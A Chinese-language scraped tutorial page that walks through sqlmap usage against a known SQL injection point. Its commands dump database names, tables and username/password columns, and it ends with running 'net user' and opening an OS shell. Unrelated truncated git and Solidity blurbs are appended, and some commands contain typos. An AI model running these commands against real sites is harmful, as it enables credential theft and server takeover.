sqlmap的命令一般都是通用的,只有極少數命令列是針對個別資料庫的。
舉例:已知存在注入點使用sqlmap對其提取管理員資料
第一步:判斷是否是注入點(引數-u)
python sqlmap.py -u
使用-u引數指定url,如果存在注入點,將會顯示web容器,資料庫版本資訊
第二步,獲取資料庫(–dbs):
python sqlmap.py -u --dbs
第三步:檢視當前應用程式所用資料庫(使用–current-db引數)
python sqlmap.py -u --current-db
第四步:列出指定資料庫所有表(–table獲取資料庫表 -d引數指定資料庫)
python sqlmap.py -u --table -d 『test』
第五步:讀取指定表中的欄位名稱(–columns引數指定欄位名)
python sqlmap.py -u --columns -t 'users' -d 'test'
第六步:讀取指定字段內容(–dump意為轉存資料,-c引數指定欄位名稱,-t指定表名(因user屬於資料庫關鍵字,所以建議加上,-d指定資料庫名稱))
python sqlmap.py -u --dump -c 『username,passwd』 -t '[user] -d 'test'
讀取資料後,sqlmap將會把讀取的資料轉存到sqlmap/output目錄下
檔案以『tabl.csv』儲存
測試所有使用者許可權
sqlmap.py -u [url] -- privileges
測試使用者***的使用者許可權
sqlmap.py -u [url] -- privileges -u ***
sqlmap區分大小寫
執行net user命令
sqlmap.py -u [url] --os-cmd='net user'
系統互動的shell
sqlmap.py -u [url] --os-shell
git快速上手教程
前幾周我第一次同時推進幾個任務,結果迷失在git版本的海洋中不能自拔。後來在同事的幫助下終於脫坑,在此把一些git的簡明用法分享給git新手們。git是用來進行版本控制的,對於同乙個專案,不同的電腦上可以存有不同的版本,同一臺電腦上也可以儲存多個版本。每個版本或者有唯一的父版本,或者由兩個版本合併而...
Git快速上手教程
首先在你的github上新建專案。然後安裝好git後,找到你專案的資料夾輸入如下命令 git init git commit m frist commit git remote add origin 你的專案位址.git git push u origin master 當你遇見這個問題時,原因是你...
Solidity 語言簡易入門,快速上手!
solidity語言是一種可以編寫智慧型合約的高階語言,當然編寫智慧型合約不止這一種,但是學習以太坊最好還是學會這一種語言就差不多了。在以太坊平台上,solidiy編寫的智慧型合約會執行在以太坊虛擬機器evm之上,變成位元組碼執行。新手入門建議使用官方ide開發工具remix。solidity語言中...